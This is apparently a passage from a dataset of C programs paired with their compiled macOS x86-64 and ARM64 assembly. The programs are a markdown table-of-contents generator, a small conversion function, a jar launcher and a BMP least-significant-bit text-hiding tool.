.globl _add_toc ## -- Begin function add_toc
.p2align 4, 0x90
_add_toc: ## @add_toc
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movl %edi, -4(%rbp)
movq %rsi, -16(%rbp)
cmpl $512, _toc_cnt(%rip) ## imm = 0x200
jl LBB2_2
## %bb.1:
jmp LBB2_3
LBB2_2:
movslq _toc_cnt(%rip), %rax
movq _toc@GOTPCREL(%rip), %rdi
shlq $10, %rax
addq %rax, %rdi
movq -16(%rbp), %rsi
movl $1024, %edx ## imm = 0x400
movq $-1, %rcx
callq ___strncpy_chk
movslq _toc_cnt(%rip), %rcx
movq _toc@GOTPCREL(%rip), %rax
shlq $10, %rcx
addq %rcx, %rax
movb $0, 1023(%rax)
movl -4(%rbp), %edx
movslq _toc_cnt(%rip), %rcx
movq _toc_level@GOTPCREL(%rip), %rax
movl %edx, (%rax,%rcx,4)
movl _toc_cnt(%rip), %eax
addl $1, %eax
movl %eax, _toc_cnt(%rip)
LBB2_3:
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _read_md_fp ## -- Begin function read_md_fp
.p2align 4, 0x90
_read_md_fp: ## @read_md_fp
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $48, %rsp
movq %rdi, -8(%rbp)
movq %rsi, -16(%rbp)
movl $0, -28(%rbp)
movl $1, -32(%rbp)
LBB3_1: ## =>This Inner Loop Header: Depth=1
movq -8(%rbp), %rdx
leaq _read_md_fp.buf(%rip), %rdi
movl $1024, %esi ## imm = 0x400
callq _fgets
movq %rax, -24(%rbp)
cmpq $0, -24(%rbp)
jne LBB3_3
## %bb.2:
addq $48, %rsp
popq %rbp
retq
LBB3_3: ## in Loop: Header=BB3_1 Depth=1
cmpl $0, -28(%rbp)
je LBB3_7
## %bb.4: ## in Loop: Header=BB3_1 Depth=1
movq -24(%rbp), %rax
movq %rax, -40(%rbp) ## 8-byte Spill
leaq _toc_end(%rip), %rdi
callq _strlen
movq -40(%rbp), %rdi ## 8-byte Reload
movq %rax, %rdx
leaq _toc_end(%rip), %rsi
callq _strncmp
cmpl $0, %eax
jne LBB3_6
## %bb.5: ## in Loop: Header=BB3_1 Depth=1
movl $0, -28(%rbp)
LBB3_6: ## in Loop: Header=BB3_1 Depth=1
jmp LBB3_23
LBB3_7: ## in Loop: Header=BB3_1 Depth=1
movsbl _read_md_fp.buf(%rip), %eax
cmpl $0, %eax
je LBB3_9
## %bb.8: ## in Loop: Header=BB3_1 Depth=1
movsbl _read_md_fp.buf(%rip), %eax
cmpl $10, %eax
jne LBB3_12
LBB3_9: ## in Loop: Header=BB3_1 Depth=1
cmpl $0, -32(%rbp)
jne LBB3_11
## %bb.10: ## in Loop: Header=BB3_1 Depth=1
movq -16(%rbp), %rsi
leaq _read_md_fp.buf(%rip), %rdi
callq _fputs
LBB3_11: ## in Loop: Header=BB3_1 Depth=1
jmp LBB3_22
LBB3_12: ## in Loop: Header=BB3_1 Depth=1
movq -24(%rbp), %rax
movq %rax, -48(%rbp) ## 8-byte Spill
leaq _toc_start(%rip), %rdi
callq _strlen
movq -48(%rbp), %rdi ## 8-byte Reload
movq %rax, %rdx
leaq _toc_start(%rip), %rsi
callq _strncmp
cmpl $0, %eax
jne LBB3_14
## %bb.13: ## in Loop: Header=BB3_1 Depth=1
movl $1, _existing_toc_found(%rip)
movl $1, -28(%rbp)
jmp LBB3_21
LBB3_14: ## in Loop: Header=BB3_1 Depth=1
movq -24(%rbp), %rdi
leaq L_.str(%rip), %rsi
movl $2, %edx
callq _strncmp
cmpl $0, %eax
jne LBB3_16
## %bb.15: ## in Loop: Header=BB3_1 Depth=1
movl $0, -32(%rbp)
movq -24(%rbp), %rsi
addq $2, %rsi
movl $1, %edi
callq _add_toc
movq -16(%rbp), %rsi
leaq _read_md_fp.buf(%rip), %rdi
callq _fputs
jmp LBB3_20
LBB3_16: ## in Loop: Header=BB3_1 Depth=1
movq -24(%rbp), %rdi
leaq L_.str.1(%rip), %rsi
movl $3, %edx
callq _strncmp
cmpl $0, %eax
jne LBB3_18
## %bb.17: ## in Loop: Header=BB3_1 Depth=1
movl $0, -32(%rbp)
movq -24(%rbp), %rsi
addq $3, %rsi
movl $2, %edi
callq _add_toc
movq -16(%rbp), %rsi
leaq _read_md_fp.buf(%rip), %rdi
callq _fputs
jmp LBB3_19
LBB3_18: ## in Loop: Header=BB3_1 Depth=1
movl $0, -32(%rbp)
movq -16(%rbp), %rsi
leaq _read_md_fp.buf(%rip), %rdi
callq _fputs
LBB3_19: ## in Loop: Header=BB3_1 Depth=1
jmp LBB3_20
LBB3_20: ## in Loop: Header=BB3_1 Depth=1
jmp LBB3_21
LBB3_21: ## in Loop: Header=BB3_1 Depth=1
jmp LBB3_22
LBB3_22: ## in Loop: Header=BB3_1 Depth=1
jmp LBB3_23
LBB3_23: ## in Loop: Header=BB3_1 Depth=1
jmp LBB3_1
.cfi_endproc
## -- End function
.globl _read_md ## -- Begin function read_md
.p2align 4, 0x90
_read_md: ## @read_md
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movq %rdi, -8(%rbp)
movq %rsi, -16(%rbp)
movq -8(%rbp), %rdi
leaq L_.str.2(%rip), %rsi
callq _fopen
movq %rax, -24(%rbp)
cmpq $0, -24(%rbp)
jne LBB4_2
## %bb.1:
movq -8(%rbp), %rdi
callq _perror
jmp LBB4_5
LBB4_2:
movq -16(%rbp), %rdi
leaq L_.str.3(%rip), %rsi
callq _fopen
movq %rax, -32(%rbp)
cmpq $0, -32(%rbp)
jne LBB4_4
## %bb.3:
movq -16(%rbp), %rdi
callq _perror
jmp LBB4_5
LBB4_4:
movq -24(%rbp), %rdi
movq -32(%rbp), %rsi
callq _read_md_fp
movq -24(%rbp), %rdi
callq _fclose
movq -32(%rbp), %rdi
callq _fclose
LBB4_5:
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _copy_to_md_fp ## -- Begin function copy_to_md_fp
.p2align 4, 0x90
_copy_to_md_fp: ## @copy_to_md_fp
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $48, %rsp
movq %rdi, -8(%rbp)
movq %rsi, -16(%rbp)
movq -16(%rbp), %rdi
leaq L_.str.4(%rip), %rsi
movb $0, %al
callq _fprintf
movq -16(%rbp), %rdi
leaq L_.str.5(%rip), %rsi
leaq _toc_start(%rip), %rdx
movb $0, %al
callq _fprintf
movq -16(%rbp), %rdi
leaq L_.str.4(%rip), %rsi
movb $0, %al
callq _fprintf
movl $0, -28(%rbp)
LBB5_1: ## =>This Loop Header: Depth=1
## Child Loop BB5_3 Depth 2
movl -28(%rbp), %eax
cmpl _toc_cnt(%rip), %eax
jge LBB5_8
## %bb.2: ## in Loop: Header=BB5_1 Depth=1
movl $0, -32(%rbp)
LBB5_3: ## Parent Loop BB5_1 Depth=1
## => This Inner Loop Header: Depth=2
movl -32(%rbp), %eax
movslq -28(%rbp), %rdx
movq _toc_level@GOTPCREL(%rip), %rcx
cmpl (%rcx,%rdx,4), %eax
jge LBB5_6
## %bb.4: ## in Loop: Header=BB5_3 Depth=2
movq -16(%rbp), %rdi
leaq L_.str.6(%rip), %rsi
movb $0, %al
callq _fprintf
## %bb.5: ## in Loop: Header=BB5_3 Depth=2
movl -32(%rbp), %eax
addl $1, %eax
movl %eax, -32(%rbp)
jmp LBB5_3
LBB5_6: ## in Loop: Header=BB5_1 Depth=1
movq -16(%rbp), %rax
movq %rax, -48(%rbp) ## 8-byte Spill
movslq -28(%rbp), %rax
movq _toc@GOTPCREL(%rip), %rdi
shlq $10, %rax
addq %rax, %rdi
callq _getentry
movq %rax, -40(%rbp) ## 8-byte Spill
movslq -28(%rbp), %rax
movq _toc@GOTPCREL(%rip), %rdi
shlq $10, %rax
addq %rax, %rdi
callq _getref
movq -48(%rbp), %rdi ## 8-byte Reload
movq -40(%rbp), %rdx ## 8-byte Reload
movq %rax, %rcx
leaq L_.str.7(%rip), %rsi
movb $0, %al
callq _fprintf
## %bb.7: ## in Loop: Header=BB5_1 Depth=1
movl -28(%rbp), %eax
addl $1, %eax
movl %eax, -28(%rbp)
jmp LBB5_1
LBB5_8:
movq -16(%rbp), %rdi
leaq L_.str.4(%rip), %rsi
movb $0, %al
callq _fprintf
movq -16(%rbp), %rdi
leaq L_.str.5(%rip), %rsi
leaq _toc_end(%rip), %rdx
movb $0, %al
callq _fprintf
movq -16(%rbp), %rdi
leaq L_.str.4(%rip), %rsi
movb $0, %al
callq _fprintf
LBB5_9: ## =>This Inner Loop Header: Depth=1
movq -8(%rbp), %rdx
leaq _copy_to_md_fp.buf(%rip), %rdi
movl $1024, %esi ## imm = 0x400
callq _fgets
movq %rax, -24(%rbp)
cmpq $0, -24(%rbp)
jne LBB5_11
## %bb.10:
addq $48, %rsp
popq %rbp
retq
LBB5_11: ## in Loop: Header=BB5_9 Depth=1
movq -16(%rbp), %rsi
leaq _copy_to_md_fp.buf(%rip), %rdi
callq _fputs
jmp LBB5_9
.cfi_endproc
## -- End function
.globl _copy_to_md ## -- Begin function copy_to_md
.p2align 4, 0x90
_copy_to_md: ## @copy_to_md
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movq %rdi, -8(%rbp)
movq %rsi, -16(%rbp)
movq -8(%rbp), %rdi
leaq L_.str.2(%rip), %rsi
callq _fopen
movq %rax, -24(%rbp)
cmpq $0, -24(%rbp)
jne LBB6_2
## %bb.1:
movq -8(%rbp), %rdi
callq _perror
jmp LBB6_5
LBB6_2:
movq -16(%rbp), %rdi
leaq L_.str.3(%rip), %rsi
callq _fopen
movq %rax, -32(%rbp)
cmpq $0, -32(%rbp)
jne LBB6_4
## %bb.3:
movq -16(%rbp), %rdi
callq _perror
jmp LBB6_5
LBB6_4:
movq -24(%rbp), %rdi
movq -32(%rbp), %rsi
callq _copy_to_md_fp
movq -24(%rbp), %rdi
callq _fclose
movq -32(%rbp), %rdi
callq _fclose
LBB6_5:
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movl $0, -4(%rbp)
movl %edi, -8(%rbp)
movq %rsi, -16(%rbp)
cmpl $1, -8(%rbp)
jg LBB7_2
## %bb.1:
movq -16(%rbp), %rax
movq (%rax), %rsi
leaq L_.str.8(%rip), %rdi
movb $0, %al
callq _printf
movl $1, -4(%rbp)
jmp LBB7_20
LBB7_2:
movq -16(%rbp), %rax
addq $8, %rax
movq %rax, -16(%rbp)
LBB7_3: ## =>This Inner Loop Header: Depth=1
movq -16(%rbp), %rax
cmpq $0, (%rax)
je LBB7_19
## %bb.4: ## in Loop: Header=BB7_3 Depth=1
movl $0, _toc_cnt(%rip)
movl $0, _existing_toc_found(%rip)
movq -16(%rbp), %rax
movq (%rax), %rdi
leaq L_.str.9(%rip), %rsi
callq _read_md
cmpl $0, _toc_cnt(%rip)
je LBB7_6
## %bb.5: ## in Loop: Header=BB7_3 Depth=1
movq -16(%rbp), %rax
movq (%rax), %rsi
leaq L_.str.9(%rip), %rdi
callq _copy_to_md
LBB7_6: ## in Loop: Header=BB7_3 Depth=1
cmpl $0, _toc_cnt(%rip)
jne LBB7_8
## %bb.7: ## in Loop: Header=BB7_3 Depth=1
movq -16(%rbp), %rax
movq (%rax), %rsi
leaq L_.str.10(%rip), %rdi
movb $0, %al
callq _printf
jmp LBB7_18
LBB7_8: ## in Loop: Header=BB7_3 Depth=1
cmpl $0, _existing_toc_found(%rip)
jne LBB7_13
## %bb.9: ## in Loop: Header=BB7_3 Depth=1
cmpl $1, _toc_cnt(%rip)
jne LBB7_11
## %bb.10: ## in Loop: Header=BB7_3 Depth=1
movq -16(%rbp), %rax
movq (%rax), %rsi
movl _toc_cnt(%rip), %edx
leaq L_.str.11(%rip), %rdi
movb $0, %al
callq _printf
jmp LBB7_12
LBB7_11: ## in Loop: Header=BB7_3 Depth=1
movq -16(%rbp), %rax
movq (%rax), %rsi
movl _toc_cnt(%rip), %edx
leaq L_.str.12(%rip), %rdi
movb $0, %al
callq _printf
LBB7_12: ## in Loop: Header=BB7_3 Depth=1
jmp LBB7_17
LBB7_13: ## in Loop: Header=BB7_3 Depth=1
cmpl $1, _toc_cnt(%rip)
jne LBB7_15
## %bb.14: ## in Loop: Header=BB7_3 Depth=1
movq -16(%rbp), %rax
movq (%rax), %rsi
movl _toc_cnt(%rip), %edx
leaq L_.str.13(%rip), %rdi
movb $0, %al
callq _printf
jmp LBB7_16
LBB7_15: ## in Loop: Header=BB7_3 Depth=1
movq -16(%rbp), %rax
movq (%rax), %rsi
movl _toc_cnt(%rip), %edx
leaq L_.str.14(%rip), %rdi
movb $0, %al
callq _printf
LBB7_16: ## in Loop: Header=BB7_3 Depth=1
jmp LBB7_17
LBB7_17: ## in Loop: Header=BB7_3 Depth=1
jmp LBB7_18
LBB7_18: ## in Loop: Header=BB7_3 Depth=1
movq -16(%rbp), %rax
addq $8, %rax
movq %rax, -16(%rbp)
jmp LBB7_3
LBB7_19:
movl $0, -4(%rbp)
LBB7_20:
movl -4(%rbp), %eax
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __DATA,__data
.globl _toc_start ## @toc_start
.p2align 4
_toc_start:
.asciz "[tocstart]: # (toc start)"
.globl _toc_end ## @toc_end
.p2align 4
_toc_end:
.asciz "[tocend]: # (toc end)"
.globl _toc_cnt ## @toc_cnt
.zerofill __DATA,__common,_toc_cnt,4,2
.globl _existing_toc_found ## @existing_toc_found
.zerofill __DATA,__common,_existing_toc_found,4,2
.zerofill __DATA,__bss,_getentry.buf,1024,4 ## @getentry.buf
.zerofill __DATA,__bss,_getref.buf,1024,4 ## @getref.buf
.comm _toc,524288,4 ## @toc
.comm _toc_level,2048,4 ## @toc_level
.zerofill __DATA,__bss,_read_md_fp.buf,1024,4 ## @read_md_fp.buf
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "# "
L_.str.1: ## @.str.1
.asciz "## "
L_.str.2: ## @.str.2
.asciz "r"
L_.str.3: ## @.str.3
.asciz "w"
.zerofill __DATA,__bss,_copy_to_md_fp.buf,1024,4 ## @copy_to_md_fp.buf
L_.str.4: ## @.str.4
.asciz "\n"
L_.str.5: ## @.str.5
.asciz "%s\n"
L_.str.6: ## @.str.6
.asciz " "
L_.str.7: ## @.str.7
.asciz "* [%s](#%s)\n"
L_.str.8: ## @.str.8
.asciz "%s [markdown files]\n"
L_.str.9: ## @.str.9
.asciz "tmp.md"
L_.str.10: ## @.str.10
.asciz "%s: nothing changed (no headings found)\n"
L_.str.11: ## @.str.11
.asciz "%s: added %d toc entry\n"
L_.str.12: ## @.str.12
.asciz "%s: added %d toc entries\n"
L_.str.13: ## @.str.13
.asciz "%s: replaced %d toc entry\n"
L_.str.14: ## @.str.14
.asciz "%s: replaced %d toc entries\n"
.subsections_via_symbols
| the_stack_data/82950329.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.subsections_via_symbols
| the_stack_data/111334.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _bar ; -- Begin function bar
.p2align 2
_bar: ; @bar
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
sturh w0, [x29, #-2]
ldurh w0, [x29, #-2]
bl _cvtsi_v4hi
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function cvtsi_v4hi
_cvtsi_v4hi: ; @cvtsi_v4hi
.cfi_startproc
; %bb.0:
sub sp, sp, #16
.cfi_def_cfa_offset 16
str w0, [sp, #12]
ldrsw x8, [sp, #12]
str x8, [sp]
ldr x8, [sp]
fmov d0, x8
add sp, sp, #16
ret
.cfi_endproc
; -- End function
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _bar ## -- Begin function bar
.p2align 4, 0x90
_bar: ## @bar
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movw %di, %ax
movw %ax, -10(%rbp)
movzwl -10(%rbp), %edi
callq _cvtsi_v4hi
movsd %xmm0, -24(%rbp)
movq -24(%rbp), %rax
movq %rax, -8(%rbp)
movsd -8(%rbp), %xmm0 ## xmm0 = mem[0],zero
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function cvtsi_v4hi
_cvtsi_v4hi: ## @cvtsi_v4hi
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movl %edi, -12(%rbp)
movslq -12(%rbp), %rax
movq %rax, -24(%rbp)
movq -24(%rbp), %rax
movq %rax, -8(%rbp)
movsd -8(%rbp), %xmm0 ## xmm0 = mem[0],zero
popq %rbp
retq
.cfi_endproc
## -- End function
.subsections_via_symbols
| the_stack_data/706443.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
mov w8, #0
str w8, [sp, #12] ; 4-byte Folded Spill
stur wzr, [x29, #-4]
stur w0, [x29, #-8]
str x1, [sp, #16]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _system
ldr w0, [sp, #12] ; 4-byte Folded Reload
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "java -jar ShootPlane.jar"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movl $0, -4(%rbp)
movl %edi, -8(%rbp)
movq %rsi, -16(%rbp)
leaq L_.str(%rip), %rdi
callq _system
xorl %eax, %eax
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "java -jar ShootPlane.jar"
.subsections_via_symbols
| the_stack_data/193892264.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #160
.cfi_def_cfa_offset 160
stp x29, x30, [sp, #144] ; 16-byte Folded Spill
add x29, sp, #144
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur wzr, [x29, #-4]
stur w0, [x29, #-8]
stur x1, [x29, #-16]
ldur w8, [x29, #-8]
subs w8, w8, #3
cset w8, ge
tbnz w8, #0, LBB0_2
b LBB0_1
LBB0_1:
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _puts
mov w8, #1
stur w8, [x29, #-4]
b LBB0_35
LBB0_2:
ldur x8, [x29, #-16]
ldr x8, [x8, #8]
ldrb w8, [x8]
sturb w8, [x29, #-17]
ldursb w8, [x29, #-17]
subs w8, w8, #101
cset w8, ne
tbnz w8, #0, LBB0_4
b LBB0_3
LBB0_3:
ldur x8, [x29, #-16]
ldr x0, [x8, #16]
adrp x1, l_.str.1@PAGE
add x1, x1, l_.str.1@PAGEOFF
bl _fopen
stur x0, [x29, #-32]
b LBB0_5
LBB0_4:
ldur x8, [x29, #-16]
ldr x0, [x8, #16]
adrp x1, l_.str.2@PAGE
add x1, x1, l_.str.2@PAGEOFF
bl _fopen
stur x0, [x29, #-32]
b LBB0_5
LBB0_5:
ldur x8, [x29, #-32]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB0_7
b LBB0_6
LBB0_6:
ldur x8, [x29, #-16]
ldr x8, [x8, #16]
mov x9, sp
str x8, [x9]
adrp x0, l_.str.3@PAGE
add x0, x0, l_.str.3@PAGEOFF
bl _printf
mov w8, #2
stur w8, [x29, #-4]
b LBB0_35
LBB0_7:
ldur x0, [x29, #-32]
mov x1, #10
mov w2, #0
str w2, [sp, #28] ; 4-byte Folded Spill
bl _fseek
ldur x0, [x29, #-32]
bl _fgetc
str w0, [sp, #16] ; 4-byte Folded Spill
ldur x0, [x29, #-32]
bl _fgetc
mov x8, x0
ldr w0, [sp, #16] ; 4-byte Folded Reload
orr w8, w0, w8, lsl #8
str w8, [sp, #20] ; 4-byte Folded Spill
ldur x0, [x29, #-32]
bl _fgetc
ldr w8, [sp, #20] ; 4-byte Folded Reload
orr w8, w8, w0, lsl #16
str w8, [sp, #24] ; 4-byte Folded Spill
ldur x0, [x29, #-32]
bl _fgetc
ldr w8, [sp, #24] ; 4-byte Folded Reload
ldr w2, [sp, #28] ; 4-byte Folded Reload
orr w8, w8, w0, lsl #24
stur w8, [x29, #-36]
ldur x0, [x29, #-32]
mov x1, #18
bl _fseek
ldur x0, [x29, #-32]
bl _fgetc
str w0, [sp, #32] ; 4-byte Folded Spill
ldur x0, [x29, #-32]
bl _fgetc
mov x8, x0
ldr w0, [sp, #32] ; 4-byte Folded Reload
orr w8, w0, w8, lsl #8
str w8, [sp, #36] ; 4-byte Folded Spill
ldur x0, [x29, #-32]
bl _fgetc
ldr w8, [sp, #36] ; 4-byte Folded Reload
orr w8, w8, w0, lsl #16
str w8, [sp, #40] ; 4-byte Folded Spill
ldur x0, [x29, #-32]
bl _fgetc
ldr w8, [sp, #40] ; 4-byte Folded Reload
orr w8, w8, w0, lsl #24
stur w8, [x29, #-40]
ldur x0, [x29, #-32]
bl _fgetc
str w0, [sp, #44] ; 4-byte Folded Spill
ldur x0, [x29, #-32]
bl _fgetc
mov x8, x0
ldr w0, [sp, #44] ; 4-byte Folded Reload
orr w8, w0, w8, lsl #8
str w8, [sp, #48] ; 4-byte Folded Spill
ldur x0, [x29, #-32]
bl _fgetc
ldr w8, [sp, #48] ; 4-byte Folded Reload
orr w8, w8, w0, lsl #16
str w8, [sp, #52] ; 4-byte Folded Spill
ldur x0, [x29, #-32]
bl _fgetc
ldr w8, [sp, #52] ; 4-byte Folded Reload
orr w8, w8, w0, lsl #24
stur w8, [x29, #-44]
ldur w8, [x29, #-40]
mov w9, #3
mul w8, w8, w9
mov w10, #4
sdiv w9, w8, w10
mul w9, w9, w10
subs w8, w8, w9
sturb w8, [x29, #-45]
ands w8, w8, #0xff
cset w8, eq
tbnz w8, #0, LBB0_9
b LBB0_8
LBB0_8:
ldursb w9, [x29, #-45]
mov w8, #4
subs w8, w8, w9
sturb w8, [x29, #-45]
b LBB0_9
LBB0_9:
ldur x0, [x29, #-32]
ldursw x1, [x29, #-36]
mov w2, #0
bl _fseek
ldur w8, [x29, #-40]
ldur w9, [x29, #-44]
mul w8, w8, w9
mov w9, #3
sdiv w8, w8, w9
stur w8, [x29, #-52]
ldursw x0, [x29, #-52]
mov x1, #1
bl _calloc
stur x0, [x29, #-64]
ldursb w8, [x29, #-17]
subs w8, w8, #101
cset w8, ne
tbnz w8, #0, LBB0_11
b LBB0_10
LBB0_10:
adrp x0, l_.str.4@PAGE
add x0, x0, l_.str.4@PAGEOFF
bl _puts
ldur x0, [x29, #-64]
ldur w1, [x29, #-52]
adrp x8, ___stdinp@GOTPAGE
ldr x8, [x8, ___stdinp@GOTPAGEOFF]
ldr x2, [x8]
bl _fgets
b LBB0_11
LBB0_11:
str xzr, [sp, #72]
str wzr, [sp, #68]
b LBB0_12
LBB0_12: ; =>This Loop Header: Depth=1
; Child Loop BB0_14 Depth 2
; Child Loop BB0_16 Depth 3
ldr w8, [sp, #68]
ldur w9, [x29, #-44]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_32
b LBB0_13
LBB0_13: ; in Loop: Header=BB0_12 Depth=1
str wzr, [sp, #64]
b LBB0_14
LBB0_14: ; Parent Loop BB0_12 Depth=1
; => This Loop Header: Depth=2
; Child Loop BB0_16 Depth 3
ldr w8, [sp, #64]
ldur w9, [x29, #-40]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_30
b LBB0_15
LBB0_15: ; in Loop: Header=BB0_14 Depth=2
str wzr, [sp, #60]
b LBB0_16
LBB0_16: ; Parent Loop BB0_12 Depth=1
; Parent Loop BB0_14 Depth=2
; => This Inner Loop Header: Depth=3
ldr w8, [sp, #60]
subs w8, w8, #3
cset w8, ge
tbnz w8, #0, LBB0_28
b LBB0_17
LBB0_17: ; in Loop: Header=BB0_16 Depth=3
ldursb w8, [x29, #-17]
subs w8, w8, #101
cset w8, ne
tbnz w8, #0, LBB0_22
b LBB0_18
LBB0_18: ; in Loop: Header=BB0_16 Depth=3
ldur x0, [x29, #-32]
bl _fgetc
and w8, w0, #0xfe
strb w8, [sp, #59]
ldur x8, [x29, #-64]
ldr x9, [sp, #72]
mov x10, #9
str x10, [sp, #8] ; 8-byte Folded Spill
sdiv x9, x9, x10
ldrsb w8, [x8, x9]
ldr x9, [sp, #72]
mov x11, #8
sdiv x10, x9, x11
mul x10, x10, x11
subs x9, x9, x10
; kill: def $w9 killed $w9 killed $x9
asr w8, w8, w9
mov w2, #1
and w8, w8, #0x1
strb w8, [sp, #58]
ldur x0, [x29, #-32]
mov x1, #-1
bl _fseek
ldrsb w8, [sp, #59]
ldrsb w9, [sp, #58]
orr w0, w8, w9
ldur x1, [x29, #-32]
bl _fputc
ldr x10, [sp, #8] ; 8-byte Folded Reload
ldur x8, [x29, #-64]
ldr x9, [sp, #72]
sdiv x9, x9, x10
subs x9, x9, #1
ldrsb w8, [x8, x9]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB0_21
b LBB0_19
LBB0_19: ; in Loop: Header=BB0_16 Depth=3
ldr x8, [sp, #72]
subs x8, x8, #9
cset w8, le
tbnz w8, #0, LBB0_21
b LBB0_20
LBB0_20: ; in Loop: Header=BB0_14 Depth=2
b LBB0_28
LBB0_21: ; in Loop: Header=BB0_16 Depth=3
b LBB0_26
LBB0_22: ; in Loop: Header=BB0_16 Depth=3
ldur x0, [x29, #-32]
bl _fgetc
and w8, w0, #0x1
strb w8, [sp, #57]
ldrsb w8, [sp, #57]
ldr x9, [sp, #72]
mov x11, #8
sdiv x10, x9, x11
mul x10, x10, x11
subs x9, x9, x10
; kill: def $w9 killed $w9 killed $x9
lsl w11, w8, w9
ldur x8, [x29, #-64]
ldr x9, [sp, #72]
mov x10, #9
sdiv x9, x9, x10
add x9, x8, x9
ldrsb w8, [x9]
orr w8, w8, w11
strb w8, [x9]
ldur x8, [x29, #-64]
ldr x9, [sp, #72]
sdiv x9, x9, x10
subs x9, x9, #1
ldrsb w8, [x8, x9]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB0_25
b LBB0_23
LBB0_23: ; in Loop: Header=BB0_16 Depth=3
ldr x8, [sp, #72]
subs x8, x8, #9
cset w8, le
tbnz w8, #0, LBB0_25
b LBB0_24
LBB0_24: ; in Loop: Header=BB0_14 Depth=2
b LBB0_28
LBB0_25: ; in Loop: Header=BB0_16 Depth=3
b LBB0_26
LBB0_26: ; in Loop: Header=BB0_16 Depth=3
ldr x8, [sp, #72]
add x8, x8, #1
str x8, [sp, #72]
b LBB0_27
LBB0_27: ; in Loop: Header=BB0_16 Depth=3
ldr w8, [sp, #60]
add w8, w8, #1
str w8, [sp, #60]
b LBB0_16
LBB0_28: ; in Loop: Header=BB0_14 Depth=2
b LBB0_29
LBB0_29: ; in Loop: Header=BB0_14 Depth=2
ldr w8, [sp, #64]
add w8, w8, #1
str w8, [sp, #64]
b LBB0_14
LBB0_30: ; in Loop: Header=BB0_12 Depth=1
ldur x0, [x29, #-32]
ldursb x1, [x29, #-45]
mov w2, #1
bl _fseek
b LBB0_31
LBB0_31: ; in Loop: Header=BB0_12 Depth=1
ldr w8, [sp, #68]
add w8, w8, #1
str w8, [sp, #68]
b LBB0_12
LBB0_32:
ldur x0, [x29, #-32]
bl _fclose
ldursb w8, [x29, #-17]
subs w8, w8, #100
cset w8, ne
tbnz w8, #0, LBB0_34
b LBB0_33
LBB0_33:
